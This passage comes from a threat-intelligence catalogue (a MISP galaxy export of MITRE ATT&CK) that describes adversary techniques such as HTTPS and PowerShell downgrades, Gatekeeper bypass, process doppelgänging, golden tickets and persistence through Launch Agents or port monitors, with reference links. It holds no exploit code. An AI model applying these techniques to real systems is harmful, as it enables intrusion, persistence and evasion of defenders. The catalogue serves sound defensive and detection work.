Adversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) or [Network Sniffing](https://attack.mitre.org/techniques/T1040).(Citation: Praetorian TLS Downgrade Attack 2014) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging)

Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade)

The tag is: misp-galaxy:mitre-attack-pattern="Downgrade Attack - T1562.010"

Table 6068. Table References

Links

https://attack.mitre.org/techniques/T1562/010

https://blog.checkpoint.com/research/targeted-ssl-stripping-attacks-are-real/amp/

https://nsfocusglobal.com/attack-and-defense-around-powershell-event-logging/

https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/

https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/

https://www.crowdstrike.com/cybersecurity-101/attack-types/downgrade-attacks/

https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique

https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/

Business Relationships - T1591.002

Adversaries may gather information about the victim’s business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="Business Relationships - T1591.002"

Table 6069. Table References

Links

https://attack.mitre.org/techniques/T1591/002

https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/

Cloud Account - T1136.003

Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)

Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.

Once an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) or assigning [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Account - T1136.003"

Table 6070. Table References

Links

https://attack.mitre.org/techniques/T1136/003

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-users-azure-active-directory

https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide

https://support.google.com/cloudidentity/answer/7332836?hl=en&ref_topic=7558554

https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d

System Checks - T1633.001

Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behavior after checking for the presence of artifacts indicative of a virtual environment or sandbox. If the adversary detects a virtual environment, they may alter their malware’s behavior to disengage from the victim or conceal the core functions of the implant. They may also search for virtualization artifacts before dropping secondary or additional payloads.

Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size.

Hardware checks, such as the presence of motion sensors, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.

The tag is: misp-galaxy:mitre-attack-pattern="System Checks - T1633.001"

Table 6071. Table References

Links

https://attack.mitre.org/techniques/T1633/001

Outlook Forms - T1137.003

Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)

Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)

The tag is: misp-galaxy:mitre-attack-pattern="Outlook Forms - T1137.003"

Table 6072. Table References

Links

https://attack.mitre.org/techniques/T1137/003

https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack

https://github.com/sensepost/notruler

https://sensepost.com/blog/2017/outlook-forms-and-shells/

Launch Agent - T1543.001

Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>~/Library/LaunchAgents</code>.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the <code>Label</code>, <code>ProgramArguments </code>, and <code>RunAtLoad</code> keys to identify the Launch Agent’s name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.

Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command.

Adversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the <code>RunAtLoad</code> or <code>KeepAlive</code> keys set to <code>true</code>.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X)

The tag is: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001"

Table 6073. Table References

Links

https://attack.mitre.org/techniques/T1543/001

https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/

https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html

https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update

https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

Web Protocols - T1437.001

Adversaries may communicate using application layer protocols associated with web protocols traffic to avoid detection/network filtering by blending in with existing traffic. Commands to remote mobile devices, and often the results of those commands, will be embedded within the protocol traffic between the mobile client and server.

Web protocols such as HTTP and HTTPS are used for web traffic as well as well as notification services native to mobile messaging services such as Google Cloud Messaging (GCM) and newly, Firebase Cloud Messaging (FCM), (GCM/FCM: two-way communication) and Apple Push Notification Service (APNS; one-way server-to-device). Such notification services leverage HTTP/S via the respective API and are commonly abused on Android and iOS respectively in order blend in with routine device traffic making it difficult for enterprises to inspect.

The tag is: misp-galaxy:mitre-attack-pattern="Web Protocols - T1437.001"

Table 6074. Table References

Links

https://attack.mitre.org/techniques/T1437/001

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html

Gatekeeper Bypass - T1553.001

Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )

Based on an opt-in system, when files are downloaded an extended attribute (xattr) called com.apple.quarantine (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions:

  1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS X)(Citation: 20 macOS Common Tools and Techniques)

  2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers.

  3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID.

  4. Notarization - Using the api.apple-cloudkit.com API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified.

Adversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton)

Applications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).

The tag is: misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1553.001"

Table 6075. Table References

Links

https://attack.mitre.org/techniques/T1553/001

https://eclecticlight.co/2020/08/28/how-notarization-works/

https://eclecticlight.co/2020/10/29/quarantine-and-the-quarantine-flag/

https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/

https://redcanary.com/blog/mac-application-bundles/

https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/

https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update

Process Doppelgänging - T1055.013

Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process.

Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)

Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)

Adversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging’s use of TxF also avoids the use of highly-monitored API functions such as <code>NtUnmapViewOfSection</code>, <code>VirtualProtectEx</code>, and <code>SetThreadContext</code>. (Citation: BlackHat Process Doppelgänging Dec 2017)

Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):

  • Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.

  • Load – Create a shared section of memory and load the malicious executable.

  • Rollback – Undo changes to original executable, effectively removing malicious code from the file system.

  • Animate – Create a process from the tainted section of memory and initiate execution.

This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Process Doppelgänging - T1055.013"

Table 6076. Table References

Links

https://attack.mitre.org/techniques/T1055/013

https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/

https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx

https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx

https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx

https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx

https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf

SSH Hijacking - T1563.001

Adversaries may hijack a legitimate user’s SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.

In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent’s socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack)

[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).

The tag is: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1563.001"

Table 6077. Table References

Links

https://attack.mitre.org/techniques/T1563/001

https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident

https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-boileau.pdf

https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking

https://www.slideshare.net/morisson/mistrusting-and-abusing-ssh-13526219

URI Hijacking - T1635.001

Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data.

Applications regularly register URIs with the operating system to act as a response handler for various actions, such as logging into an app using an external account via single sign-on. This allows redirections to that specific URI to be intercepted by the application. If an adversary were to register for a URI that was already in use by a genuine application, the adversary may be able to intercept data intended for the genuine application or perform a phishing attack against the genuine application. Intercepted data may include OAuth authorization codes or tokens that could be used by the adversary to gain access to protected resources.(Citation: Trend Micro iOS URL Hijacking)(Citation: IETF-PKCE)

The tag is: misp-galaxy:mitre-attack-pattern="URI Hijacking - T1635.001"

Table 6078. Table References

Links

https://attack.mitre.org/techniques/T1635/001

https://blog.trendmicro.com/trendlabs-security-intelligence/ios-url-scheme-susceptible-to-hijacking/

https://developer.android.com/training/app-links/index.html

https://tools.ietf.org/html/rfc7636

https://tools.ietf.org/html/rfc8252

Symmetric Cryptography - T1573.001

Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.

The tag is: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001"

Table 6079. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1573/001

Outlook Rules - T1137.005

Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)

Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)

The tag is: misp-galaxy:mitre-attack-pattern="Outlook Rules - T1137.005"

Table 6080. Table References

Links

https://attack.mitre.org/techniques/T1137/005

https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/

https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack

https://github.com/sensepost/notruler

https://silentbreaksecurity.com/malicious-outlook-rules/

Social Media - T1593.001

Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.

Adversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).

The tag is: misp-galaxy:mitre-attack-pattern="Social Media - T1593.001"

Table 6081. Table References

Links

https://attack.mitre.org/techniques/T1593/001

https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e

Calendar Entries - T1636.001

Adversaries may utilize standard operating system APIs to gather calendar entry data. On Android, this can be accomplished using the Calendar Content Provider. On iOS, this can be accomplished using the EventKit framework.

If the device has been jailbroken or rooted, an adversary may be able to access [Calendar Entries](https://attack.mitre.org/techniques/T1636/001) without the user’s knowledge or approval.

The tag is: misp-galaxy:mitre-attack-pattern="Calendar Entries - T1636.001"

Table 6082. Table References

Links

https://attack.mitre.org/techniques/T1636/001

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

VDSO Hijacking - T1055.014

Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process.

VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009)(Citation: Backtrace VDSO)(Citation: VDSO Aug 2005)(Citation: Syscall 2014)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="VDSO Hijacking - T1055.014"

Table 6083. Table References

Links

http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing

https://attack.mitre.org/techniques/T1055/014

https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/

https://lwn.net/Articles/604515/

https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/

https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html

https://www.gnu.org/software/acct/

AppInit DLLs - T1546.010

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppInit_DLLs</code> value in the Registry keys <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> or <code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017)

Similar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity.

The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)

The tag is: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1546.010"

Table 6084. Table References

Links

https://attack.mitre.org/techniques/T1546/010

https://msdn.microsoft.com/en-us/library/dn280412

https://support.microsoft.com/en-us/kb/197571

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Port Monitors - T1547.010

Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the <code>AddMonitor</code> API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in <code>C:\Windows\System32</code> and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.(Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to <code>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>.

The Registry key contains entries for the following:

  • Local Port

  • Standard TCP/IP Port

  • USB Monitor

  • WSD Port

Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.

The tag is: misp-galaxy:mitre-attack-pattern="Port Monitors - T1547.010"

Table 6085. Table References

Links

http://msdn.microsoft.com/en-us/library/dd183341

https://attack.mitre.org/techniques/T1547/010

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf

Identify Roles - T1591.004

Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).

The tag is: misp-galaxy:mitre-attack-pattern="Identify Roles - T1591.004"

Table 6086. Table References

Links

https://attack.mitre.org/techniques/T1591/004

https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/

System Checks - T1497.001

Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)

Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment.

Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size.

Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output.

Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)

The tag is: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001"

Table 6087. Table References

Links

https://attack.mitre.org/techniques/T1497/001

https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc

https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/

Golden Ticket - T1558.001

Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection)

Using a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)

The KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.

The tag is: misp-galaxy:mitre-attack-pattern="Golden Ticket - T1558.001"

Table 6088. Table References

Links

https://adsecurity.org/?p=1515

https://adsecurity.org/?p=1640

https://adsecurity.org/?p=483

https://attack.mitre.org/techniques/T1558/001

https://blog.stealthbits.com/detect-pass-the-ticket-attacks

https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf

https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285

Spearphishing Attachment - T1566.001

Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary’s payload exploits a vulnerability or directly executes on the user’s system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001"

Table 6089. Table References

Links

https://attack.mitre.org/techniques/T1566/001

https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide

https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf

https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql

Create Snapshot - T1578.001

An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.

An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Create Snapshot - T1578.001"

Table 6090. Table References

Links

https://attack.mitre.org/techniques/T1578/001

https://cloud.google.com/compute/docs/instances/create-start-instance#api_2

https://cloud.google.com/logging/docs/audit#admin-activity

https://content.fireeye.com/m-trends/rpt-m-trends-2020

https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html

https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor

Spearphishing Service - T1598.001

Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.

